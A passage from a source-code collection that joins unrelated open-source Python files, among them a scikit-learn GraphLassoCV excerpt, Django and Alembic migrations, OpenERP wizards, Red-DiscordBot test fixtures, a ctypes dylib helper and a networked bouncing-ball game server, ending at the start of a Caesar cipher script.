# grid, we need to refine the grid there
alpha_1 = path[best_index][0]
alpha_0 = path[best_index + 1][0]
elif best_index == len(path) - 1:
alpha_1 = path[best_index][0]
alpha_0 = 0.01 * path[best_index][0]
else:
alpha_1 = path[best_index - 1][0]
alpha_0 = path[best_index + 1][0]
if not isinstance(n_alphas, collections.Sequence):
alphas = np.logspace(np.log10(alpha_1), np.log10(alpha_0),
n_alphas + 2)
alphas = alphas[1:-1]
if self.verbose and n_refinements > 1:
print('[GraphLassoCV] Done refinement % 2i out of %i: % 3is'
% (i + 1, n_refinements, time.time() - t0))
path = list(zip(*path))
grid_scores = list(path[1])
alphas = list(path[0])
# Finally, compute the score with alpha = 0
alphas.append(0)
grid_scores.append(cross_val_score(EmpiricalCovariance(), X,
cv=cv, n_jobs=self.n_jobs,
verbose=inner_verbose))
self.grid_scores = np.array(grid_scores)
best_alpha = alphas[best_index]
self.alpha_ = best_alpha
self.cv_alphas_ = alphas
# Finally fit the model with the selected alpha
self.covariance_, self.precision_, self.n_iter_ = graph_lasso(
emp_cov, alpha=best_alpha, mode=self.mode, tol=self.tol,
enet_tol=self.enet_tol, max_iter=self.max_iter,
verbose=inner_verbose, return_n_iter=True)
return self
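# Usage sketch (illustrative): cross-validated choice of alpha.
#
#     import numpy as np
#     from sklearn.covariance import GraphLassoCV
#
#     X = np.random.RandomState(0).randn(80, 5)
#     model = GraphLassoCV(alphas=4, n_refinements=2).fit(X)
#     model.alpha_       # selected penalty
#     model.cv_alphas_   # all penalties explored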
|
bsd-3-clause
|
fighterlyt/bite-project
|
server/handlers/common_util.py
|
17
|
2084
|
# Copyright 2011 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""The common lib utils."""
__author__ = 'phu@google.com (Po Hu)'
from models import bite_event
from utils import bite_constants
def GetEventData(event):
"""Gets the events data."""
event_id = str(bite_event.BiteEvent.host.get_value_for_datastore(event))
event_type = event.event_type
name = event.name or ''
labels = event.labels or []
  icon = ''  # fallback so icon is defined even for unmapped event types
  if event_type == 'project':
icon = '/images/spec/performance.png'
elif event_type == 'suite' or event_type == 'set':
event_type = 'set'
icon = '/images/artifacts/testautomated.png'
elif event_type == 'run':
icon = '/images/sample/run01-pie.png'
elif event_type == 'schedule':
icon = '/images/spec/security.png'
elif event_type == 'run_template':
icon = '/images/sample/run01-pie.png'
event_type = 'runTemplate'
action = ''
if event.action:
action = bite_constants.EVENT_ACTION_TO_READABLE[event.action]
action = ' '.join([event_type, action])
email = ''
if event.created_by:
email = event.created_by.email()
return {'id': event_id,
'extraId': str(event.key()),
'type': event_type,
'title': name,
'labels': labels,
'icon': icon,
'actions': [
{'title': 'View details',
'operation': 'viewDetails'}],
'props': [{'label': 'action', 'value': action},
{'label': 'by', 'value': email},
{'label': 'around', 'value': str(event.created_time)}]}
|
apache-2.0
|
edxnercel/edx-platform
|
lms/djangoapps/certificates/migrations/0019_auto__add_certificatehtmlviewconfiguration.py
|
101
|
7978
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'CertificateHtmlViewConfiguration'
db.create_table('certificates_certificatehtmlviewconfiguration', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('change_date', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
('changed_by', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'], null=True, on_delete=models.PROTECT)),
('enabled', self.gf('django.db.models.fields.BooleanField')(default=False)),
('configuration', self.gf('django.db.models.fields.TextField')()),
))
db.send_create_signal('certificates', ['CertificateHtmlViewConfiguration'])
def backwards(self, orm):
# Deleting model 'CertificateHtmlViewConfiguration'
db.delete_table('certificates_certificatehtmlviewconfiguration')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'certificates.certificategenerationconfiguration': {
'Meta': {'object_name': 'CertificateGenerationConfiguration'},
'change_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'changed_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'on_delete': 'models.PROTECT'}),
'enabled': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'certificates.certificatehtmlviewconfiguration': {
'Meta': {'object_name': 'CertificateHtmlViewConfiguration'},
'change_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'changed_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'on_delete': 'models.PROTECT'}),
'configuration': ('django.db.models.fields.TextField', [], {}),
'enabled': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'certificates.certificatewhitelist': {
'Meta': {'object_name': 'CertificateWhitelist'},
'course_id': ('xmodule_django.models.CourseKeyField', [], {'default': 'None', 'max_length': '255', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'whitelist': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
'certificates.generatedcertificate': {
'Meta': {'unique_together': "(('user', 'course_id'),)", 'object_name': 'GeneratedCertificate'},
'course_id': ('xmodule_django.models.CourseKeyField', [], {'default': 'None', 'max_length': '255', 'blank': 'True'}),
'created_date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'auto_now_add': 'True', 'blank': 'True'}),
'distinction': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'download_url': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '128', 'blank': 'True'}),
'download_uuid': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '32', 'blank': 'True'}),
'error_reason': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '512', 'blank': 'True'}),
'grade': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '5', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '32', 'blank': 'True'}),
'mode': ('django.db.models.fields.CharField', [], {'default': "'honor'", 'max_length': '32'}),
'modified_date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'auto_now': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'unavailable'", 'max_length': '32'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'verify_uuid': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '32', 'blank': 'True'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
}
}
complete_apps = ['certificates']
|
agpl-3.0
|
kirca/OpenUpgrade
|
addons/hr_timesheet_invoice/report/__init__.py
|
433
|
1136
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import account_analytic_profit
import report_analytic
import hr_timesheet_invoice_report
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
agpl-3.0
|
tetherless-world/graphene
|
whyis/datastore/user.py
|
2
|
1067
|
from flask_security import UserMixin
from flask_security.utils import verify_and_update_password
from whyis.namespace import dc, auth, foaf, prov
from .single import single
from .multiple import multiple
from .mapped_resource import MappedResource
class User(MappedResource, UserMixin):
rdf_type = prov.Agent
key = 'id'
id = single(dc.identifier)
active = single(auth.active)
confirmed_at = single(auth.confirmed)
email = single(auth.email)
current_login_at = single(auth.hadCurrentLogin)
    current_login_ip = single(auth.hadCurrentLoginIP)
    last_login_at = single(auth.hadLastLogin)
    last_login_ip = single(auth.hadLastLoginIP)
    login_count = single(auth.hadLoginCount)
    roles = multiple(auth.hasRole)
    password = single(auth.passwd)
familyName = single(foaf.familyName)
givenName = single(foaf.givenName)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def verify_and_update_password(self, password):
return verify_and_update_password(password, self)
|
apache-2.0
|
ksrajkumar/openerp-6.1
|
openerp/addons/idea/wizard/idea_post_vote.py
|
9
|
6466
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from osv import fields, osv
from tools.translate import _
class idea_post_vote(osv.osv_memory):
""" Post Vote For Idea """
_name = "idea.post.vote"
_description = "Post vote"
_columns = {
'vote': fields.selection([('-1', 'Not Voted'),
('0', 'Very Bad'),
('25', 'Bad'),
('50', 'Normal'),
('75', 'Good'),
('100', 'Very Good') ],
'Post Vote', required=True),
'note': fields.text('Description'),
}
def get_default(self, cr, uid, context=None):
"""
This function checks for precondition before wizard executes
@param self: The object pointer
@param cr: the current row, from the database cursor,
@param uid: the current user’s ID for security checks,
@param fields: List of fields for default value
@param context: A standard dictionary for contextual values
"""
if context is None:
context = {}
idea_obj = self.pool.get('idea.idea')
if context.get('active_id'):
idea = idea_obj.browse(cr, uid, context.get('active_id'), context=context)
return idea.my_vote
else:
return 75
_defaults = {
'vote': get_default,
}
def view_init(self, cr, uid, fields, context=None):
"""
This function checks for precondition before wizard executes
@param self: The object pointer
@param cr: the current row, from the database cursor,
@param uid: the current user’s ID for security checks,
@param fields: List of fields for default value
@param context: A standard dictionary for contextual values
"""
idea_obj = self.pool.get('idea.idea')
vote_obj = self.pool.get('idea.vote')
        if context is None:
            context = {}
        ctx_key = 'idea_ids' if context.get('idea_ids') is not None else 'active_ids'
        for idea in idea_obj.browse(cr, uid, context.get(ctx_key, []), context=context):
            vote_ids = vote_obj.search(cr, uid, [('user_id', '=', uid), ('idea_id', '=', idea.id)])
            count = len(vote_ids)
            user_limit = idea.vote_limit
            if count >= user_limit:
                raise osv.except_osv(_('Warning !'), _("You cannot vote for this idea more than %s times") % (user_limit,))
if idea.state != 'open':
raise osv.except_osv(_('Warning !'), _('Idea must be in \
\'Open\' state before vote for that idea.'))
return False
def do_vote(self, cr, uid, ids, context=None):
"""
Create idea vote.
@param cr: the current row, from the database cursor,
@param uid: the current user’s ID for security checks,
@param ids: List of Idea Post vote’s IDs.
@return: Dictionary {}
"""
        if context is None:
            context = {}
        ctx_key = 'idea_ids' if context.get('idea_ids') is not None else 'active_ids'
idea_id = context[ctx_key][0]
vote_pool = self.pool.get('idea.vote')
idea_pool = self.pool.get('idea.idea')
comment_pool = self.pool.get('idea.comment')
for do_vote_obj in self.read(cr, uid, ids, context=context):
score = str(do_vote_obj['vote'])
comment = do_vote_obj.get('note', False)
vote = {
'idea_id': idea_id,
'user_id': uid,
'score': score
}
if comment:
comment = {
'user_id':uid,
'idea_id':idea_id,
'content': comment,
}
comment = comment_pool.create(cr, uid, comment)
idea_pool._vote_save(cr, uid, idea_id, None, score, context)
#vote = vote_pool.create(cr, uid, vote)
return {'type': 'ir.actions.act_window_close'}
idea_post_vote()
class idea_select(osv.osv_memory):
""" Select idea for vote."""
_name = "idea.select"
_description = "select idea"
_columns = {
'idea_id': fields.many2one('idea.idea', 'Idea', required=True),
}
def open_vote(self, cr, uid, ids, context=None):
"""
This function load column.
@param cr: the current row, from the database cursor,
@param uid: the current users ID for security checks,
@param ids: List of load column,
@return: dictionary of query logs clear message window
"""
if context is None:
context = {}
idea_obj = self.browse(cr, uid, ids, context=context)
for idea in idea_obj:
idea_id = idea.idea_id.id
data_obj = self.pool.get('ir.model.data')
id2 = data_obj._get_id(cr, uid, 'idea', 'view_idea_post_vote')
if id2:
id2 = data_obj.browse(cr, uid, id2, context=context).res_id
value = {
'view_type': 'form',
'view_mode': 'form',
'res_model': 'idea.post.vote',
'views': [(id2, 'form'), (False, 'tree'), (False, 'calendar'), (False, 'graph')],
'type': 'ir.actions.act_window',
'target': 'new',
'context': {'idea_ids': [idea_id]}
}
return value
idea_select()
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
agpl-3.0
|
jayceyxc/hue
|
desktop/core/ext-py/Django-1.6.10/django/contrib/webdesign/tests.py
|
232
|
1092
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import unittest
from django.contrib.webdesign.lorem_ipsum import *
from django.template import loader, Context
class WebdesignTest(unittest.TestCase):
def test_words(self):
self.assertEqual(words(7), 'lorem ipsum dolor sit amet consectetur adipisicing')
def test_paragraphs(self):
self.assertEqual(paragraphs(1),
['Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.'])
def test_lorem_tag(self):
t = loader.get_template_from_string("{% load webdesign %}{% lorem 3 w %}")
self.assertEqual(t.render(Context({})),
'lorem ipsum dolor')
|
apache-2.0
|
Tranzystorek/servo
|
tests/wpt/web-platform-tests/tools/html5lib/setup.py
|
418
|
1694
|
from distutils.core import setup
import os
import codecs
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Text Processing :: Markup :: HTML'
]
packages = ['html5lib'] + ['html5lib.'+name
for name in os.listdir(os.path.join('html5lib'))
if os.path.isdir(os.path.join('html5lib', name)) and
not name.startswith('.') and name != 'tests']
current_dir = os.path.dirname(__file__)
with codecs.open(os.path.join(current_dir, 'README.rst'), 'r', 'utf8') as readme_file:
with codecs.open(os.path.join(current_dir, 'CHANGES.rst'), 'r', 'utf8') as changes_file:
long_description = readme_file.read() + '\n' + changes_file.read()
setup(name='html5lib',
version='0.9999-dev',
url='https://github.com/html5lib/html5lib-python',
license="MIT License",
      description='HTML parser based on the WHATWG HTML specification',
long_description=long_description,
classifiers=classifiers,
maintainer='James Graham',
maintainer_email='james@hoppipolla.co.uk',
packages=packages,
install_requires=[
'six',
],
)
|
mpl-2.0
|
alphagov/notifications-api
|
migrations/versions/0321_drop_postage_constraints.py
|
1
|
2423
|
"""
Revision ID: 0321_drop_postage_constraints
Revises: 0320_optimise_notifications
Create Date: 2020-06-08 11:48:53.315768
"""
import os
from alembic import op
revision = '0321_drop_postage_constraints'
down_revision = '0320_optimise_notifications'
environment = os.environ['NOTIFY_ENVIRONMENT']
def upgrade():
if environment not in ["live", "production"]:
op.execute('ALTER TABLE notifications DROP CONSTRAINT IF EXISTS chk_notifications_postage_null')
op.execute('ALTER TABLE notification_history DROP CONSTRAINT IF EXISTS chk_notification_history_postage_null')
op.execute('ALTER TABLE templates DROP CONSTRAINT IF EXISTS chk_templates_postage')
op.execute('ALTER TABLE templates_history DROP CONSTRAINT IF EXISTS chk_templates_history_postage')
def downgrade():
# The downgrade command must not be run in production - it will lock the tables for a long time
if environment not in ["live", "production"]:
op.execute("""
ALTER TABLE notifications ADD CONSTRAINT "chk_notifications_postage_null"
CHECK (
CASE WHEN notification_type = 'letter' THEN
postage is not null and postage in ('first', 'second')
ELSE
postage is null
END
)
""")
op.execute("""
ALTER TABLE notification_history ADD CONSTRAINT "chk_notification_history_postage_null"
CHECK (
CASE WHEN notification_type = 'letter' THEN
postage is not null and postage in ('first', 'second')
ELSE
postage is null
END
)
""")
op.execute("""
ALTER TABLE templates ADD CONSTRAINT "chk_templates_postage"
CHECK (
CASE WHEN template_type = 'letter' THEN
postage is not null and postage in ('first', 'second')
ELSE
postage is null
END
)
""")
op.execute("""
ALTER TABLE templates_history ADD CONSTRAINT "chk_templates_history_postage"
CHECK (
CASE WHEN template_type = 'letter' THEN
postage is not null and postage in ('first', 'second')
ELSE
postage is null
END
)
""")
|
mit
|
int19h/PTVS
|
Python/Product/Miniconda/Miniconda3-x64/Lib/ctypes/macholib/dylib.py
|
320
|
1828
|
"""
Generic dylib path manipulation
"""
import re
__all__ = ['dylib_info']
DYLIB_RE = re.compile(r"""(?x)
(?P<location>^.*)(?:^|/)
(?P<name>
(?P<shortname>\w+?)
(?:\.(?P<version>[^._]+))?
(?:_(?P<suffix>[^._]+))?
\.dylib$
)
""")
def dylib_info(filename):
"""
A dylib name can take one of the following four forms:
Location/Name.SomeVersion_Suffix.dylib
Location/Name.SomeVersion.dylib
Location/Name_Suffix.dylib
Location/Name.dylib
returns None if not found or a mapping equivalent to:
dict(
location='Location',
name='Name.SomeVersion_Suffix.dylib',
shortname='Name',
version='SomeVersion',
suffix='Suffix',
)
Note that SomeVersion and Suffix are optional and may be None
if not present.
"""
is_dylib = DYLIB_RE.match(filename)
if not is_dylib:
return None
return is_dylib.groupdict()
def test_dylib_info():
def d(location=None, name=None, shortname=None, version=None, suffix=None):
return dict(
location=location,
name=name,
shortname=shortname,
version=version,
suffix=suffix
)
assert dylib_info('completely/invalid') is None
assert dylib_info('completely/invalide_debug') is None
assert dylib_info('P/Foo.dylib') == d('P', 'Foo.dylib', 'Foo')
assert dylib_info('P/Foo_debug.dylib') == d('P', 'Foo_debug.dylib', 'Foo', suffix='debug')
assert dylib_info('P/Foo.A.dylib') == d('P', 'Foo.A.dylib', 'Foo', 'A')
assert dylib_info('P/Foo_debug.A.dylib') == d('P', 'Foo_debug.A.dylib', 'Foo_debug', 'A')
assert dylib_info('P/Foo.A_debug.dylib') == d('P', 'Foo.A_debug.dylib', 'Foo', 'A', 'debug')
if __name__ == '__main__':
test_dylib_info()
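# Example (a hypothetical path, traced through DYLIB_RE above):
#   dylib_info('usr/lib/libSystem.B.dylib')
#   -> {'location': 'usr/lib', 'name': 'libSystem.B.dylib',
#       'shortname': 'libSystem', 'version': 'B', 'suffix': None}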
|
apache-2.0
|
ARG-TLQ/Red-DiscordBot
|
redbot/pytest/core.py
|
4
|
3759
|
import random
from collections import namedtuple
from pathlib import Path
import weakref
import pytest
from redbot.core import Config
from redbot.core.bot import Red
from redbot.core import config as config_module, drivers
__all__ = [
"override_data_path",
"coroutine",
"driver",
"config",
"config_fr",
"red",
"guild_factory",
"empty_guild",
"empty_channel",
"empty_member",
"empty_message",
"empty_role",
"empty_user",
"member_factory",
"user_factory",
"ctx",
]
@pytest.fixture(autouse=True)
def override_data_path(tmpdir):
from redbot.core import data_manager
data_manager.basic_config = data_manager.basic_config_default
data_manager.basic_config["DATA_PATH"] = str(tmpdir)
@pytest.fixture()
def coroutine():
async def some_coro(*args, **kwargs):
return args, kwargs
return some_coro
@pytest.fixture()
def driver(tmpdir_factory):
import uuid
rand = str(uuid.uuid4())
path = Path(str(tmpdir_factory.mktemp(rand)))
return drivers.get_driver("PyTest", str(random.randint(1, 999999)), data_path_override=path)
@pytest.fixture()
def config(driver):
config_module._config_cache = weakref.WeakValueDictionary()
conf = Config(cog_name="PyTest", unique_identifier=driver.unique_cog_identifier, driver=driver)
yield conf
@pytest.fixture()
def config_fr(driver):
"""
Mocked config object with force_register enabled.
"""
config_module._config_cache = weakref.WeakValueDictionary()
conf = Config(
cog_name="PyTest",
unique_identifier=driver.unique_cog_identifier,
driver=driver,
force_registration=True,
)
yield conf
# region Dpy Mocks
@pytest.fixture()
def guild_factory():
mock_guild = namedtuple("Guild", "id members")
class GuildFactory:
def get(self):
return mock_guild(random.randint(1, 999999999), [])
return GuildFactory()
@pytest.fixture()
def empty_guild(guild_factory):
return guild_factory.get()
@pytest.fixture(scope="module")
def empty_channel():
mock_channel = namedtuple("Channel", "id")
return mock_channel(random.randint(1, 999999999))
@pytest.fixture(scope="module")
def empty_role():
mock_role = namedtuple("Role", "id")
return mock_role(random.randint(1, 999999999))
@pytest.fixture()
def member_factory(guild_factory):
mock_member = namedtuple("Member", "id guild display_name")
class MemberFactory:
def get(self):
return mock_member(random.randint(1, 999999999), guild_factory.get(), "Testing_Name")
return MemberFactory()
@pytest.fixture()
def empty_member(member_factory):
return member_factory.get()
@pytest.fixture()
def user_factory():
mock_user = namedtuple("User", "id")
class UserFactory:
def get(self):
return mock_user(random.randint(1, 999999999))
return UserFactory()
@pytest.fixture()
def empty_user(user_factory):
return user_factory.get()
@pytest.fixture(scope="module")
def empty_message():
mock_msg = namedtuple("Message", "content")
return mock_msg("No content.")
@pytest.fixture()
def ctx(empty_member, empty_channel, empty_message, red):
mock_ctx = namedtuple("Context", "author guild channel message bot")
return mock_ctx(empty_member, empty_member.guild, empty_channel, empty_message, red)
# endregion
# region Red Mock
@pytest.fixture()
def red(config_fr):
from redbot.core.cli import parse_cli_flags
cli_flags = parse_cli_flags(["ignore_me"])
description = "Red v3 - Alpha"
Config.get_core_conf = lambda *args, **kwargs: config_fr
red = Red(cli_flags=cli_flags, description=description, dm_help=None, owner_ids=set())
yield red
# endregion
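# Usage sketch: request any of the fixtures above by name in a cog's test
# module (the test below is hypothetical):
#   def test_new_guild_is_empty(empty_guild):
#       assert empty_guild.members == []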
|
gpl-3.0
|
fin/memorial-page
|
mysite/receivers.py
|
43
|
1348
|
from django.dispatch import receiver
from account.signals import password_changed
from account.signals import user_sign_up_attempt, user_signed_up
from account.signals import user_login_attempt, user_logged_in
from pinax.eventlog.models import log
@receiver(user_logged_in)
def handle_user_logged_in(sender, **kwargs):
log(
user=kwargs.get("user"),
action="USER_LOGGED_IN",
extra={}
)
@receiver(password_changed)
def handle_password_changed(sender, **kwargs):
log(
user=kwargs.get("user"),
action="PASSWORD_CHANGED",
extra={}
)
@receiver(user_login_attempt)
def handle_user_login_attempt(sender, **kwargs):
log(
user=None,
action="LOGIN_ATTEMPTED",
extra={
"username": kwargs.get("username"),
"result": kwargs.get("result")
}
)
@receiver(user_sign_up_attempt)
def handle_user_sign_up_attempt(sender, **kwargs):
log(
user=None,
action="SIGNUP_ATTEMPTED",
extra={
"username": kwargs.get("username"),
"email": kwargs.get("email"),
"result": kwargs.get("result")
}
)
@receiver(user_signed_up)
def handle_user_signed_up(sender, **kwargs):
log(
user=kwargs.get("user"),
action="USER_SIGNED_UP",
extra={}
)
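# Inspecting the resulting audit trail (a sketch; assumes pinax-eventlog is
# installed and migrated):
#   from pinax.eventlog.models import Log
#   Log.objects.filter(action="USER_LOGGED_IN").count()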
|
mit
|
reidyd/legume
|
examples/bounceball/server.py
|
2
|
4144
|
#!/usr/bin/env python
import logging
import time
import legume
import shared
import random
class ServerBall(shared.Ball):
BALL_ID = 0
def __init__(self, env):
shared.Ball.__init__(self, env)
self.x = random.randint(0, shared.ZONE_WIDTH)
self.y = random.randint(0, shared.ZONE_HEIGHT)
self.vx = random.randint(-200, 200)
self.vy = random.randint(-200, 200)
self.ball_id = ServerBall.BALL_ID
ServerBall.BALL_ID += 1
def calculate_ahead(self):
nb = ServerBall(self.env)
        nb.x = self.x + self.vx
        nb.y = self.y + self.vy
        nb.vx = self.vx
        nb.vy = self.vy
        nb.frame_number = self.frame_number  # carry the frame counter forward for extrapolation
return nb
def update(self):
self.x += self.vx
self.y += self.vy
if self.x > shared.ZONE_WIDTH or self.x < 0: self.vx = -self.vx
if self.y > shared.ZONE_HEIGHT or self.y < 0: self.vy = -self.vy
def get_message(self, calculate_ahead=True):
message = shared.BallUpdate()
message.ball_id.value = self.ball_id
if calculate_ahead:
nb = self.calculate_ahead()
else:
nb = self
message.x.value = nb.x
message.y.value = nb.y
message.vx.value = nb.vx
message.vy.value = nb.vy
if calculate_ahead:
message.frame_number.value = nb.frame_number + 1
else:
message.frame_number.value = nb.frame_number
return message
class BallServer(shared.BallEnvironment):
def __init__(self):
shared.BallEnvironment.__init__(self)
self._server = legume.Server()
self._server.OnConnectRequest += self.join_request_handler
self._server.OnMessage += self.message_handler
self._update_timer = time.time()
self.checkup_timer = time.time()
self.checkup_framecount = 0
def message_handler(self, sender, message):
if message.MessageTypeID == shared.CreateBallCommand.MessageTypeID:
self.spawn_ball((message.x.value, message.y.value))
def join_request_handler(self, sender, args):
self.send_initial_state(sender)
def _send_update(self):
self.send_updates(self._server)
def go(self):
self._server.listen(('', shared.PORT))
print('Listening on port %d' % shared.PORT)
for x in range(1):
self.spawn_ball()
while True:
# Physics stuff
self._update_balls()
if time.time()-self.checkup_timer >= 3.0:
print('Frames:', self.frame_number - self.checkup_framecount,)
print('Time:', time.time() - self.checkup_timer)
self.checkup_timer = time.time()
self.checkup_framecount = self.frame_number
# Network stuff
if time.time() > self._update_timer + shared.UPDATE_RATE:
self._send_update()
self._update_timer = time.time()
self._server.update()
time.sleep(0.0001)
def spawn_ball(self, position=None):
if position is None:
new_ball = ServerBall(self)
self.insert_ball(new_ball)
else:
new_ball = ServerBall(self)
new_ball.x = position[0]
new_ball.y = position[1]
self.insert_ball(new_ball)
print('Spawning ball with ID %s %s' % (new_ball.ball_id, new_ball.debug()))
def send_updates(self, server):
for ball in self._balls.itervalues():
logging.debug('**** sending update for ball # %s' % ball.ball_id)
print('Sending update for ball # %s' % ball.ball_id)
server.send_reliable_message_to_all(ball.get_message())
def send_initial_state(self, endpoint):
for ball in self._balls.itervalues():
endpoint.send_message(ball.get_message(False))
def main():
server = BallServer()
server.go()
if __name__ == '__main__':
logging.basicConfig(filename='server.log', level=logging.DEBUG,
filemode="w",
format="%(asctime)s - %(name)s - %(levelname)s - %(message)s")
main()
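# To try it out (requires the companion shared.py and the legume package on
# PYTHONPATH):
#   $ python server.py     # listens on shared.PORT and logs to server.log
# then point one or more bounceball clients at this host.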
|
bsd-3-clause
|
jayc0b0/Projects
|
Python/Security/caesarCypher.py
|
1
|
1545
|
# Jacob Orner (jayc0b0)
# Caesar Cypher script
def main():
# Declare variables and take input
global alphabet
alphabet = ['a', 'b', 'c', 'd', 'e', 'f',
'g', 'h', 'i', 'j', 'k', 'l',
